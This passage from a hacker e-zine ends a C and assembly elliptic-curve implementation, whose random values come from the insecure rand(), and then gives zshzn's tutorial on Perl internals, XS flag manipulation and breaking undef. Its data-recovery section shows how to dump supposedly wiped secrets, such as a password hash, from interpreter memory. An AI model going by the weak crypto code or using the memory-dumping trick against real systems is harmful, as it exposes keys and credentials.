c[2*i] += POW[(a[i]>>0x08) & 0xFF] << 0x10;
c[2*i+1] = POW[(a[i]>>0x10) & 0xFF];
c[2*i+1] += POW[(a[i]>>0x18) & 0xFF] << 0x10;
}
return __reduce(c,r);
}

word* polyDiv(word *c, word *a, word *b) {
word t[SIZE_WORDS];
return polyMul(c,a,polyInv(t,b));
}

word* polyInv(word *r, word* a) {

register word t;
register int j;

word x[5*SIZE_WORDS] = {0},
*v = &x[1*SIZE_WORDS],
*u = &x[2*SIZE_WORDS],
*g = &x[3*SIZE_WORDS],
*f = &x[4*SIZE_WORDS];

memcpy(u,a,SIZE_BYTES);

v[0] = 0x425;
v[SIZE_WORDS-1] = 0x08000000;
g[0] = 1;

inv_loop:
if (u[0]==1 || u[0]==0) {
for (j=1;j<SIZE_WORDS;j++)
if (u[j]) goto inv_run;
goto inv_done;
}
inv_run:
if ((j = deg(u)-deg(v)) < 0) {
t = (word) v; v = u; u = (word*) t; // v <-> u
t = (word) g; g = f; f = (word*) t; // g <-> f
j = -j; }

memcpy(x,v,SIZE_BYTES);
lshift(x,j);
polyAddTo(u,x); // u = u + v>>j

memcpy(x,f,SIZE_BYTES);
lshift(x,j);
polyAddTo(g,x); // g = g + f>>j

goto inv_loop;
inv_done:

memcpy(r, g,SIZE_BYTES);
return r;
}

__declspec(naked) word* __fastcall polyAddTo(word* a, word* b) {
__asm {
mov edi, ecx
mov ecx, SIZE_WORDS
_add_to_loop:
mov eax, [edx+4*ecx-4]
xor [edi+4*ecx-4], eax
loop _add_to_loop
mov ecx, edi
ret
} }


word* __fastcall polyAdd(word* c, word* a, word* b) {
__asm {
mov ebx,ecx
mov esi,b
mov ecx, SIZE_WORDS
_add_loop:
mov eax, [edx+4*ecx-4]
xor eax, [esi+4*ecx-4]
mov [ebx+4*ecx-4], eax
loop _add_loop
} }


_declspec(naked) void __fastcall lshift(word* a, word n) {
__asm {
test edx,edx
jnz _lshift_nonzeroshift
ret
_lshift_nonzeroshift:
mov edi,ecx
mov esi,edi
mov eax,edx
shr eax,3
test eax,eax
je _lshift_go
mov ecx, SIZE_BYTES
sub ecx, eax
js _lshift_zero
add edi, eax
_lshift_preloop:
dec ecx
mov bl, byte ptr[esi+ecx]
mov byte ptr [edi+ecx], bl
test ecx, ecx
jne _lshift_preloop
mov ecx, eax
_lshift_zloop:
mov byte ptr [esi+ecx-1],0
loop _lshift_zloop
;; add esi, eax
shl eax, 3
sub edx, eax
jz _lshift_done
_lshift_go:
mov ecx,SIZE_WORDS
mov edi,esi
clc
_lshift_subloop:
rcl dword ptr [edi], 1
inc edi
inc edi
inc edi
inc edi
loop _lshift_subloop
dec edx
jne _lshift_go
_lshift_done:
ret
_lshift_zero:
mov ecx,SIZE_BYTES
_lshift_zloop2:
mov byte ptr [esi+eax],0
loop _lshift_zloop2
ret
} }



_declspec(naked) void __fastcall lshift2(word* a, word n) {
__asm {
test edx,edx
jnz _lshift2_nonzeroshift
ret
_lshift2_nonzeroshift:
mov edi,ecx
mov esi,edi
mov eax,edx
shr eax,3
test eax,eax
je _lshift2_go
mov ecx, SIZE_BYTES2
sub ecx, eax
js _lshift2_zero
add edi, eax
_lshift2_preloop:
dec ecx
mov bl, byte ptr[esi+ecx]
mov byte ptr [edi+ecx], bl
test ecx, ecx
jne _lshift2_preloop
mov ecx, eax
_lshift2_zloop:
mov byte ptr [esi+ecx-1],0
loop _lshift2_zloop
;; add esi, eax
shl eax, 3
sub edx, eax
jz _lshift2_done
_lshift2_go:
mov edi, esi
mov ecx, SIZE_WORDS2
clc
_lshift2_subloop:
rcl dword ptr [edi],1
inc edi
inc edi
inc edi
inc edi
loop _lshift2_subloop
dec edx
jne _lshift2_go
_lshift2_done:
ret
_lshift2_zero:
mov ecx,SIZE_BYTES2
_lshift2_zloop2:
mov byte ptr [esi+eax],0
loop _lshift2_zloop2
ret
} }


_declspec(naked) void __fastcall rshift(word* a, word n) {
__asm {
mov edi,ecx
mov esi,edi
mov eax,edx
shr eax,3
test eax,eax
je _rshift_go
push eax
mov ebx, SIZE_BYTES
sub ebx, eax
js _rshift_zero
xor ecx, ecx
add edi, eax
_rshift_preloop:
mov al, byte ptr[edi+ecx]
mov byte ptr [esi+ecx], al
inc ecx
cmp ecx, ebx
jl _rshift_preloop
mov edi,esi
add edi,ebx
pop ecx
mov eax,ecx
_rshift_zloop:
mov byte ptr [edi+ecx-1],0
loop _rshift_zloop
shl eax, 3
sub edx, eax
jz _rshift_done
_rshift_go:
mov ecx,SIZE_WORDS
mov edi,esi
sub edi,4
shr dword ptr [edi+4*ecx],1
dec ecx
_rshift_subloop:
rcr dword ptr [edi+4*ecx], 1
loop _rshift_subloop
dec edx
jne _rshift_go
_rshift_done:
ret
_rshift_zero:
mov ecx,SIZE_BYTES
_rshift_zloop2:
mov byte ptr [esi+eax],0
loop _rshift_zloop2
ret
} }



word* polyGen() {
return calloc(SIZE_WORDS,sizeof(word));
}

word* polyRand() {
register int i;
register word* p = calloc(SIZE_WORDS,sizeof(word));

for (i=SIZE_WORDS-1;i>=0;i--)
p[i] = (rand()<<16) | rand();
p[SIZE_WORDS-1] &= EMPTY_MASK;
return p;
}



int deg(word *a) {
__asm {
mov edx, a
mov ecx, SIZE_WORDS
_deg_loop:
mov ebx, [edx+4*ecx-4]
test ebx,ebx
jnz _deg_done
loop _deg_loop
xor eax,eax
jmp _deg_zero
_deg_done:
finit
push 1
fild dword ptr [esp]
mov dword ptr [esp],0
push ebx
fild qword ptr [esp]
fyl2x

fstcw word ptr [esp] ; round down
fstcw word ptr [esp+2]
and word ptr[esp],0xF3FF
or word ptr[esp], 0x400
fldcw [esp]
frndint
fldcw [esp+2]

fistp qword ptr [esp]
pop ebx
pop eax
mov eax,32
dec ecx
mul ecx
add eax,ebx
inc eax
_deg_zero:

}
}

__declspec(naked) int __fastcall polyCmp(word* a, word* b) {
__asm {
mov edi, ecx ; edi=a/edx=b
xor eax, eax
mov ecx, SIZE_WORDS
__loop_cmp:
mov ebx, [edi+ecx*4-4] ; ebx = a[n]
mov esi, [edx+ecx*4-4] ; esi = b[n]
test ebx,ebx
jz __a_n_zero
test esi,esi
jnz __b_n_notzero
inc eax
ret
__b_n_notzero:
cmp ebx, esi
jz __next_cmp
jl __lesser_cmp
inc eax
ret
__lesser_cmp:
dec eax
ret
__next_cmp:
loop __loop_cmp
ret
__a_n_zero:
test esi,esi
jz __next_cmp
dec eax
ret
} }

__declspec(naked) int __fastcall polyIsZero(word* a) {
__asm {
mov edi, ecx ; edi=a/edx=b
xor eax, eax
mov ecx, SIZE_WORDS
__iszero_loop:
cmp [edi+ecx*4-4],0
jne __is_not_zero
loop __iszero_loop
inc eax
__is_not_zero:
ret
} }

word* dup(word* a) {
register word* b = polyGen();
memcpy(b,a,SIZE_BYTES);
return b;
}


---------------------------------<curve.h>---------------------------------

#ifndef _CURVE_H
#define _CURVE_H

#include "binfields.h"

// We will use, by default, the Koblitz Curve
// y2 + xy = x3 + 1

word* pointMul(word* R, word* k, word* P);

word* pointAdd(word* R, word* P, word* Q);
word* pointDbl(word* R, word* P);
word* pointNeg(word* P);
word* pointZero(word* P);

int isZero(word* P);
int isValidPoint(word* P);
int pointCmp(word* P, word* Q);


word* pointDup(word* P);
word* pointGen();
word* pointGenZero();

#endif

---------------------------------<curve.c>---------------------------------

#include <stdlib.h>
#include <memory.h>
#include "curve.h"

#define Y(__P) (&__P[SIZE_WORDS])
#define X(__P) __P


word PGEN[]= {
0xA01C8972,0xE2945283,0x4DCA88C7,0x988B4717,0x494776FB,0xBBD1BA39,
0xB4CEB08C,0x47DA304D,0x93B205E6,0x43709584,0x01841CA4,0x60248048,
0x0012D5D4,0xAC9CA297,0xF8103FE4,0x82189631,0x59923FBC,0x026EB7A8,
0x3EF1C7A3,0x01CD4C14,0x591984F6,0x320430C8,0x7BA7AF1B,0xB620B01A,
0xF772AEDC,0x4FBEBBB9,0xAC44AEA7,0x9D4979C0,0x006D8A2C,0xFFC61EFC,
0x9F307A54,0x4DD58CEC,0x3BCA9531,0x4F4AEADE,0x7F4FBF37,0x0349DC80
};

int isValidPoint(word* P) {

// y2+xy=x3+1

word t[SIZE_WORDS] = {0},
l[SIZE_WORDS] = {0};

polyAdd(t,X(P),Y(P));
polyMul(t,t,Y(P)); // left side

polySqr(l,X(P));
polyMul(l,l,X(P));
l[0] ^= 1; // right side

return !polyCmp(t,l);
}

word* pointDup(word *P) {
return memcpy(malloc(SIZE_WORDS2*sizeof(word)),P,SIZE_BYTES2);
}

int pointCmp(word* P, word* Q) {
switch (polyCmp(X(P),X(Q))) {
case 1: return 1;
case -1: return -1;
default: return polyCmp(Y(P),Y(Q));
} }

word* pointGen() {
word* P = malloc(SIZE_WORDS2 * sizeof(word));
return memcpy(P,PGEN,SIZE_BYTES2);
}

word* pointGenZero() {
word* pt = calloc(SIZE_WORDS2, sizeof(word));
pt[SIZE_WORDS-1] = 1 << 31;
return pt;
}

int isZero(word* P) {
return (P[SIZE_WORDS-1]>>31);
}

word* pointZero(word* P) {
memset(P,0,SIZE_BYTES2);
P[SIZE_WORDS-1] = 1 << 31;
return P;
}

word* pointDbl(word* R, word* P) {

word t1[SIZE_WORDS] = {0};
word t2[SIZE_WORDS];

if (isZero(P))
return (R==P)?R:memcpy(R,P,SIZE_BYTES2);

else if (!polyCmp(t1,P)) return pointZero(R);


polyDiv(Y(R),Y(P),X(P));
polyAddTo(Y(R),X(P));
R[SIZE_WORDS] ^= 1;

polySqr(t2,X(P)); // t2 = x2
polyInv(t1,t2);
polyAddTo(t1,t2); // t1 = x'
polyMul(Y(R),Y(R),t1);
polyAddTo(Y(R),t2);

return memcpy(R,t1,SIZE_BYTES);
}



word* pointNeg(word* P) {
if (isZero(P)) return P;
polyAddTo(Y(P),X(P));
return P;
}


word* pointAdd(word* R, word* P, word* Q) {

word l[SIZE_WORDS],
x[SIZE_WORDS],
y[SIZE_WORDS];

if (isZero(Q)) {
if (R==P) return R;
else return memcpy(R,P,SIZE_BYTES2);
} else if (isZero(P)) {
if (R==Q) return R;
else return memcpy(R,Q,SIZE_BYTES2);
} else {

if (!pointCmp(P,Q)) {
return pointDbl(R,P);
} else {
word* N = pointNeg(pointDup(Q));

if (!pointCmp(P,N)) {
pointZero(R);
free(N);
return R;
} else free(N);

polyAdd(l, Y(P), Y(Q));
polyAdd(x, X(P), X(Q));
polyDiv(l, l, x);
polyAddTo(x,polySqr(y,l));
polyAddTo(x,l);

polyAdd(y, x, X(P));
polyMul(y, y, l);
polyAddTo(y, x);
polyAdd(Y(R), y, Y(P));

return memcpy(X(R),x,SIZE_BYTES);
}
}
}


word* pointSub(word* R, word* P, word* Q) {
word* N = pointNeg(pointDup(Q));
pointAdd(R,P,N);
free(N);
return R;
}


word* pointMul(word* R, word* k, word* P) {

register int i;
word* Q = pointDup(P);

for (i=deg(k)-1;i>=0;i--) {
pointDbl(Q,Q);
if ((k[i/32]>>(i%32))&1)
pointAdd(Q, Q,P);
}

memcpy(R,Q,SIZE_BYTES2);
free(Q);
return R;
}


--------------------------------[ EOF ]--------------------------------

[==========================================================================]
[-----------------------------[ Breaking Perl ]----------------------------]
[==========================================================================]


_==####==_
.############.
.################.
.##################.__ __ __ __ _ _ __ __
##############/?_`|#\ V V // _` | '_/ -_)
##############\__,|# \_/\_/ \__,_|_| \___|
###########*?*######
*#########{ }####*
##########._.#####
################
*############* By: zshzn
?==####==? Email: zshzn@hackaholic.org



-[ 0.0 ]---------------------------------------------------[ Contents ]-----


1.0 Introduction

2.0 The SV
2.1 Introduction to SVs
2.2 Dual Types Challenge
2.3 Data Recovery Vulnerabilities

3.0 XS
3.1 Introduction to XS
3.2 Using XS
3.3 Breaking undef
3.4 The Perl API
3.5 Evil strict

4.0 Magic
4.1 Introduction to Magic
4.2 Changing Special Variables
4.3 Our Own Magic
4.4 A Magic JAPH

5.0 Closing
5.1 More Topics
5.2 Sources
5.3 Shouts

6.0 Appendix - Flag.xs



-[ 1.0 ]-----------------------------------------------[ Introduction ]-----


This article is about perl internals. This article will teach you about how
things work and how to manipulate them. Hopefully this article will inspire
you to teach yourself further and take up the hobby. If you do not code
Perl, this could be a good time to start. If you do code Perl, this could be
a very important series of lessons that could give you a greater
understanding of the language.

The first thing to remember about Perl is that it is built with C. It is a
series of extensions creating a new language. C programmers maintain that
anything that can be done in Perl can be done in C. This is rightly so, and
backed by the very nature of perl, the fact that it is, after all, written
in C. However, any Turing-complete language can do what either can. Perl is
significantly different from C to an extent that it must be viewed as
unique. However, the connection is central to this article, and it is this
connection that we explore.

Within the context of this topic I refer to a "user" as someone using Perl
to program. The user gets to use Perl as a tool, without knowing how it is
implemented and how it works. You only need to know how to manage the
features available.

Perl embraces a level of abstraction. This abstraction lives in its core and
is used through every increasing level. To emulate Perl directly in C, this
abstraction has to be done. To emulate advanced features one either
implements directly, uses a library, or does not implement at all. One
example is using regular expressions. In C you can use PCRE, Perl Compatible
Regular Expressions. It's a rather large library. This represents a direct
abstraction away from the simplicity of C. However, one is still very
limited. Although PCRE allows much more than one would sensibly implement
individually in C, it falls far short of Perl's regular expressions.
Usually, a C coder will not use regular expressions at all, and will limit
their programming to the tools they have available. C lacks the elemental
high level required to allow regular expressions that are more than a shadow
of Perl.


-[ 2.0 ]-----------------------------------------------------[ The SV ]-----


---[ 2.1 ]-------------------------------------[ Introduction to SV's ]-----


So how does Perl do it? The very base of Perl is the SV. An SV is a Scalar
Value. It is a structure that can hold a selection of a type of values,
including various other relevant data. In basics, SVs can store integers,
doubles, and strings. The code managing SVs can be found in sv.h and sv.c,
which makes up a large percentage of the overall perl code.

Taken directly from sv.h:

struct STRUCT_SV { /* struct sv { */
void* sv_any; /* pointer to something */
U32 sv_refcnt; /* how many references to us */
U32 sv_flags; /* what we are */
};

Please note that I am taken definitions from perl 5.8.8, the latest stable
version of perl. I realize that between then and now, perl 5.9.3, the
current development version, they have messed with some things, and overall
structures are a little bit more complicated. Also note that I refer to it
as "perl" when talking about the source code and application. The language
is "Perl", capitalized. I may capitalize perl to start a sentence. I also
may at times make the mistake of extracting from perl 5.9.3 instead of
5.8.8, depending on which machine I am on and my level of patience.


================================================== Obscure Reference Note ==

Please note that perl 5.9.3 does NOT mean we are seven updates away from
perl 6. You know what we are seven updates away from? perl 5.10. And it
looks to be coming along pretty nicely. Perl 6 is kind of here already, in
PUGS form, but the official, Parrot-based form is a while off, if it is
coming at all.

============================================================================

Obviously sv_refcnt is just a number, usually 1. When this hits 0 we expect
our SV to disappear, it no longer exists to us. If some secondary SV is a
reference to an original one, we can make sure our SV doesn't disappear when
we still want it. This is Perl's reference-based garbage collection. The
first three bytes of sv_flags hold 24 one-bit flags. These define what types
of data it holds, how we are to use it, and a lot of little things that
usually aren't used. They are #define'd in quite an ugly block early in
sv.h, and I shalln't repeat them here in original form for that reason.

The last byte of sv_flags represents the type of SV. This is crucial for
sv_any. IVs are integers, NVs are doubles, RVs are references, PVs are
strings. PVIV/PVNV are combinations, and everything else you don't want to
worry about right now.

typedef enum {
SVt_NULL, /* 0 */
SVt_IV, /* 1 */
SVt_NV, /* 2 */
SVt_RV, /* 3 */
SVt_PV, /* 4 */
SVt_PVIV, /* 5 */
SVt_PVNV, /* 6 */
SVt_PVMG, /* 7 */
SVt_PVBM, /* 8 */
SVt_PVLV, /* 9 */
SVt_PVAV, /* 10 */
SVt_PVHV, /* 11 */
SVt_PVCV, /* 12 */
SVt_PVGV, /* 13 */
SVt_PVFM, /* 14 */
SVt_PVIO /* 15 */
} svtype;

sv_any is a pointer towards more data. This data is usually another
structure. Before we get directly into sv_any, I would like to explain and
discuss a little bit more.

Despite the ability that an SV represents, we can already see the resource
use involved. Even discarding the other side of sv_any for the moment, we
are allocating 12 bytes to this SV. Four bytes alone to a variable that
usually just holds the value 1. It may seem outragious in the case of an
integer, but it scales well. Let's give an example of an SV. For debugging
output in Perl I use Devel::Peek::Dump and otherwise I use Perl_sv_dump,
which is the precise function wrapped by Dump. Here's an example of a simple
integer.

bash-3.00$ perl -MDevel::Peek -e '$c = 12; print Dump $c'
SV = IV(0x81420ec) at 0x812f4d8
REFCNT = 1
FLAGS = (IOK, pIOK)
IV = 12

The SV type, as stored in the last byte of sv_flags, holds the value 1,
representing an IV, which is an integer value. The flags set are IOK
(integer OK) and pIOK (private integer OK, don't worry about this one yet).
The actual number it stores is 12. Here, have a string example.

bash-3.00$ perl -MDevel::Peek -e '$c = "wer"; print Dump $c'
SV = PV(0x812f9d8) at 0x812f4d8
REFCNT = 1
FLAGS = (POK, pPOK)
PV = 0x813d128 "wer"\0
CUR = 3
LEN = 4

This one is a PV, Pointer Value (String Value, SV, is already taken
obviously). Type value 4. Flags POK and pPOK. Value "wer", and it is null
terminated to be safe for C functions. CUR is the length of the data itself,
LEN is the length of the data space delegated for it. This will not always
be just one more than CUR.

Let's get into some fun.

bash-3.00$ perl -MDevel::Peek -e '$c = 12; $c = "wer"; print Dump $c'
SV = PVIV(0x81309e8) at 0x812f4d8
REFCNT = 1
FLAGS = (POK, pPOK)
IV = 12
PV = 0x813d130 "wer"\0
CUR = 3
LEN = 4

Notice anything odd? We have BOTH an IV and a PV. This is not an IV or a
PV, this is a PVIV, type 5. However, it will always be treated as a string,
because POK is set, and IOK is not.

================================================== Obscure Reference Note ==

I could use $a as a test variable. Or $b. But I am trying to avoid that.
Why? Because they are special. Not very special, but I don't want to get
caught on anything funky. And I also do not want to confuse any readers,
who might explain odd behavior, incorrectly, on the fact that I am using
$a or $b. $a and $b are used internally by sort(), and the key difference
is that they don't have to be declared with "my" to work under strict.
Otherwise they are normal.

============================================================================



---[ 2.2 ]-------------------------------------[ Dual Types challenge ]-----


Recently I tempted people with the following:

bash-3.00$ perl test.pl

This is what you're about to see:

use strict;
use Flag qw(int_me);
my $i;
print "Insert a number: ";
chomp($i = int(<STDIN>));
$i = "This is a string";
int_me($i);
print '$i = ', $i, "\n";

Insert a number: 1337
$i = 1337
bash-3.00$

Please note that the above, excluding the prompt lines, is the output of a
program. The program itself is that code, plus a bit of code to print that.
In the above case you are prompted for a number, and then the program prints
it. At first people ask where they can find Flag. I tell them they can't,
it's homegrown, after all that is the trick. They wonder if it is a syntax
trick, or if int_me() just assigns 1337 to $i. However I assure them it is
neither. I allow the user to submit an integer to $i. I have to int() this,
because otherwise <STDIN> returns a string of course and this ends up in PV
and $i is a PV. Due to the int() $i is a regular IV, with an IV value and
flags IOK and pIOK. I then change the value of $i. Then I do something
special in int_me(), and suddenly not only is $i a number, but is the exact
number the user inputted originally, despite the impression that that number
should have disappeared.

bash-3.00$ perl -MDevel::Peek -e '$c = <STDIN>; print Dump $c'
1337
SV = PV(0x812f9d8) at 0x812f4d8
REFCNT = 1
FLAGS = (POK, pPOK)
PV = 0x81431d8 "1337\n"\0
CUR = 5
LEN = 80
bash-3.00$ perl -MDevel::Peek -e '$c = int(<STDIN>); print Dump $c'
1337
SV = IV(0x81420f4) at 0x812f4d8
REFCNT = 1
FLAGS = (IOK, pIOK)
IV = 1337

The above examples show the necessity behind the int() wrapper around
<STDIN>. What int_me() does is change flags from POK to IOK, and Perl will
thereafter access the IV value instead of the PV value. This cannot be done
in Perl itself, how I do so will be explained later. By the way, I of course
wrote stringify() and double_or_nothing() to go with int_me(). All of my XS
examples in this document can be found in Appendix A.

Why do we save the excess values, especially if we cannot use the old values
again? Because otherwise we would have to reallocate the structure, and that
usually would not be worth it. It would be worth it perhaps when going from
a very long string to something else, however doing that itself is a bad use
of a variable, both for clarity and for this reason. As well, the memory
freed might not be useful anyways.

================================================== Obscure Reference Note ==

Yet again, a perl user should not have to worry about perl internals. Perl
is a high-level language, the user optimally should not have to be aware of
how everything is

  
implemented. In Perl, things work as expected. So, using a
very long string in a variable and then assigning that variable to a small
string or a number, thereby using excessive memory, should not be held
against a user on that basis. The user does not have an obligation to know
that. However, as mentioned above, it could perhaps be held against the user
for poorly using variables, or doing so in an illogical fashion.

============================================================================

So back to sv_any. It is just a pointer towards more data, the data
structure applicable. In the above dual variable case, a PVIV system, this
is the structure:

struct xpviv {
char * xpv_pv; /* pointer to malloced string */
STRLEN xpv_cur; /* length of xpv_pv as a C string */
STRLEN xpv_len; /* allocated size */
IV xiv_iv; /* integer value or pv offset */
};

Very simple. As you can realize, an xpv is just that minus the IV field.
These structures can easily be interpreted by Perl functions, because they
recognize the type value of the sv_flags member of the host structure. As
well, they are generally designed as extensions of more base SV types.

SVs can scale to hold numbers, strings, globs, and a shitload of weird
things that you do not want to trouble your mind over right now. The other
main Perl data types are AVs and HVs. Those are Array Values and Hash Values
respectively. Both are more complicated structures, but in essence they act
as lists of SVs. The SV is the base of the language, and it in itself is
what makes Perl a much higher level language than C.



---[ 2.3 ]----------------------------[ Data Recovery Vulnerabilities ]-----


You may be reading this with some expectation of something to gain,
security-wise. I mean, why learn something if it can't help you hack? Fun?
What's that? Anyways. There are some obscure tricks that could come up from
this unexpected behavior. If you have code access, even limited, you might
be able to "use Devel::Peek; print Dump $important_var;". A good example
could be one of the many Perl shells out there. Perhaps it drops privileges
after authorization but not the current interpreter, naturally. Perhaps
there are some variables that have an important value that they thought they
wiped.

print "login: ";
chomp(my $user = <STDIN>):
print "password: ";
chomp(my $password = <STDIN>);
$hashed = get_hash($user);
set_user($user) if hash($password, $hashed);
$hashed = 0; #bye bye hashed password from /etc/shadow!
set_privs_to($user);
print $motd;

Something along that line, just not as silly and a bit more complicated.

================================================== Obscure Reference Note ==

psh, the Perl SHell, the popular one that occupies sourceforge under that
name, is a highly advanced shell. It includes over 10,000 lines of Perl and
has been long in the making. Do not expect such simple code or foolish
mistakes from them. I am just giving examples here. Then again, I'm not
giving an express guarantee that they don't have foolish mistakes. Just
don't expect it.

============================================================================

Obviously you can access $hashed and recover the root password hash,
regardless of success or not. Naturally you might want to avoid this by
undef()ing your variable first. In this case, that works. However, it turns
out undef() doesn't entirely remove the variable, nor the IV or NV value,
nor the type value, just the PV and any flags. So if it was an important
number that was saved, say, in the event of RSA key generation, it could be
recoverable.

bash-3.00$ perl -MDevel::Peek -e '$c = 5; undef $c; print Dump $c'
SV = IV(0x81420f4) at 0x812f4d8
REFCNT = 1
FLAGS = ()
IV = 5
bash-3.00$ perl -MDevel::Peek -e '$c = 5; $c = 5**50; undef $c; print Dump
$c'
SV = PVNV(0x8131e08) at 0x812f4d8
REFCNT = 1
FLAGS = ()
IV = -1
NV = 8.88178419700125e+34
PV = 0

Funky shit eh? You'd think they would go all the way. If you really, really,
want to clear the values in a variable, here is some code that does so. But
you'll have to read further to find out how to use it.

SV *
sv_my_clear(scalar)
SV* scalar
CODE:
sv_setiv(scalar, 0);
sv_setnv(scalar, 0);
sv_setpv(scalar, "");
scalar->sv_flags = 0;

Or you can use the Perl API, which is a smarter idea, with sv_clear or
sv_free.

Alternatively, if you need to revert the value back to a string or an
integer, you would need enough access to setup a relevant module (more on
this below), and use int_me(), stringify(), or something of that sort.

These might seem obtuse. Very obtuse. But they are the kind of tricks that
it is good to have in your pocket. Those tricks add up, and eventually pay
themselves back.


-[ 3.0 ]---------------------------------------------------------[ XS ]-----



---[ 3.1 ]---------------------------------------[ Introduction to XS ]-----

<fish> is it my fault that we're all about guts now?

XS is, well, a glue language of its own. Basically it is a way to use C in
Perl, and XS is mostly C code wrapped with flags telling xsubpp how to put
it together. We use XS to do two things. The first is to write functions in
C for things that we would rather not do in Perl, yet we still need to use
in Perl. The second is to mess with Perl internals themselves. The xsubpp
compiler generates a library that can be loaded in Perl modules. XS converts
Perl arguments to C arguments, executes the C function, and returns values
to Perl. It can do a few tricks too, but that is the gist of it.

I would not want to keep you waiting. Have some more XS, the card up the
sleeve of the int_me() trick.

SV*
int_me(SV* scalar)
CODE:
SvIOK_only(scalar)

Most of that is self-explanatory. You may ask, "but zshzn, doesn't this just
wrap another function of yours, SvIOK_only(SV* scalar), and you really
haven't shown us anything???"
and I will respond "no". SvIOK_only is an
internal function, part of the Perl API, and I will get to that later. The
line-break after "SV*" is needed. Paramaters can be put in either that
format or K&R style.

The earlier example (sv_my_clear) is easy to explain as well. I use three
internal functions to safely change the IV, NV, and PV values stored, and
then I directly set sv_flags to 0.

You may want a slightly more volumous example. Below is a complete file, we
will call it Flag.xs. This is my Flag module. Calm down Stephen Harper, I
said FLAG module.

================================================== Obscure Reference Note ==

Stephen Harper is, at the time of writing, the current Prime Minister of
Canada. He is a bit more "right wing" than most successful Canadian
politicians. He draws comparisons to George Bush Jr. here. However he is
much less "right wing" than the centre-left of the American Democratic
party. Regardless, jokes abound. In a recent television commercial, famous
Canadian political comedian Rick Mercer said "Today is Flag day. Calm down
Stephen Harper, I said FLAG day."
suggesting that Stephen Harper would be
upset by a supposed "Fag day" supporting homosexual rights. Or something.
Yea, the joke wasn't too good in the first place, and my copy is just that
much worse. But if I didn't say anything about it here, you might be lead to
guess that I wrote something witty and specific. So just go with that.

============================================================================

#include "EXTERN.h"
#include "perl.h"
#include "XSUB.h"
#include <math.h>
#define DEBUG 0

MODULE = Flag PACKAGE = Flag

SV *
sv_rm_flag(scalar, flag)
SV* scalar
char* flag
CODE:

char flags[24][10] = {
"PADBUSY", "PADTMP",
"PADMY", "TEMP",
"OBJECT", "GMAGICAL",
"SMAGICAL", "RMAGICAL",
"IOK", "NOK",
"POK", "ROK",
"FAKE", "OOK",
"BREAK", "READONLY",
"IOKp", "NOKp",
"POKp", "SCREAM",
"AMAGIC", "SHAREKEYS",
"LAZYDEL", "VALID"
};
int i, j;
for (i = 0; i < 24; i++) {
if ( strEQ(flag, flags[i]) ) {
j |= (int)pow(2,i+8);
j = ~j;
scalar->sv_flags &= j;
break;
}
}
if ( DEBUG ) {
printf("[ %u ]\n",scalar->sv_flags );
Perl_sv_dump(scalar);
}

Part of the way that is formatted is crucial. Everything before the first
MODULE flag is raw C and you can write direct C functions, and everything
afterwards has to be XS-style. There has to be some spacing before the first
line of code in the CODE section. There doesn't always have to be a CODE tag
but I like to include it. Empty lines are not always allowed, thus my tight
packing. The code itself is simple enough, so I have abstained from
commenting. If I was to comment, I can use Perl's pound sign for a whole
line, or C commenting otherwise. Mostly that is C, very direct. strEQ() is
another Perl API function, similar to strcmp(). What this function,
sv_rm_flag(), does, is remove a specific flag. Based on the string you
enter, it removes the corresponding flag. The included headers are essential
for XS, except for math.h which is only needed for pow() in this case. I
define the module and package as Flag, because I wanted to mess with SV
flags.


---[ 3.2 ]-------------------------------------------------[ Using XS ]-----


You may be wondering how to actually write and include XS code. As mentioned
above, you make a .so that can be dynamically loaded into Perl. You could
also create a static library and build Perl again with it, if you really
wanted to. We load this dynamic library with a Perl module. We use the
program h2xs, in this case, mostly to build a makefile for us. h2xs means
header to XS, it is designed to take a C header file and create XS for us.
Then we could mess with that code to make it more Perl-friendly. For example
to put return values directly on the Perl stack, or to work directly with
SVs instead of other variables. There are lots of reasons why one would want
to modify C code to use it with Perl. In our case, however, we are not doing
that. We are creating our XS entirely. So we just do not provide h2xs with a
header to work from.

h2xs -A -n Flag

Now we have a directly, ./Flag, with some stuff in it. We put our XS code in
Flag.xs and our module is Flag.pm

package Flag;

require Exporter;
require DynaLoader;
our @ISA = qw(Exporter DynaLoader);
@EXPORT_OK = qw / int_me /;
our $VERSION = '0.01';
bootstrap Flag;
1;

That there is my Flag.pm. For those of you not familiar with Perl modules,
almost everything there is very normal. We define our package, for the Perl
namespace. We use Exporter, which allows us to export easily to another
namespace. Consider this how we get our subroutines "out" of the module and
into your program. @EXPORT is an array of symbols to export automatically,
@EXPORT_OK is a list of symbols to export on request. It is considered bad
form most of the time to export by default. We define a version. The "1;" at
the end of the module is important, it is like "return 1;", and a module
must return success. In a regular module we would have our subroutines
between the meta-information and the "1;" at the end. In this case, however,
we use bootstrap() from DynaLoader, which does a lot of work in itself, and
ultimately calls dl_load_file($filename, $flags) which is implemented in C.
This is what actually loads our object file.

perl Makefile.PL
make

If we want to use this for testing we can create a little .pl in our working
Flag dir (or do proper tests in /t):

use ExtUtils::testlib;
use Flag;
$a = 1234;
$a = "omg hax";
Flag::int_me($a);
print $a;

You know, that kind of thing. If you want to use it natively in your Perl
scripts, make install, or manually export the files where you need them. For
the .pm that is in @INC directories and the .so needs to find it's way into
a proper auto/ directory, off an @INC.



---[ 3.3 ]-------------------------------------------[ Breaking undef ]-----


Hey, let's take undef, and break it. Oh yeah.

undef is defined as this in embedvar.h:

#define PL_sv_undef (vTHX->Isv_undef)

and as this in perlapi.h:

#define PL_sv_undef (*Perl_Isv_undef_ptr(aTHX))

So you can be assured it is one of those two.

Either way it seems to emulate a small SV.

This is used a lot in perl, in much the same way we do in Perl:

if (sv == &PL_sv_undef) {

or

sv = &PL_sv_undef;

By the way, although in my examples I tend to name my SVs as 'scalar', perl
usually uses 'sv'.

Take a look at its organs:

Perl_sv_dump((SV*)&Perl_sv_undef));

SV = NULL(0x0) at 0x812bf98
REFCNT = 2147483439
FLAGS = (READONLY)

There are a few things to note ?bout that. First of all, notice that we are
quite a bit up memory from our normal variables. Secondly, that's one
fucking large REFCNT. That is so it will never disappear on us. And, the
only flag set is readonly, and the type is 0, presumably to make sure no
functions fuck with it when it comes around. The address means that this is
defined much earlier in our process, and that we cannot add to it in-place
because we overwrite and segfault. Thus, my first attempt didn't work:

((SV*)&PL_sv_undef)->sv_flags = 67311012;
sv_setpv((SV*)&PL_sv_undef, "happy");

So what shall we do? We'll create a new SV and point PL_sv_undef at it.

SV*
sv_break_undef()
CODE:
SV* mirror = newSVpv("happy", 5);
mirror->sv_refcnt = ((SV*)&PL_sv_undef)->sv_refcnt; /* I could be
more naughy and ignore this too, but hey, undef is destroyed either way */

PL_sv_undef = *mirror;

Great! Now I can break any code that uses undef in any way. I like to break
code and see what happens.



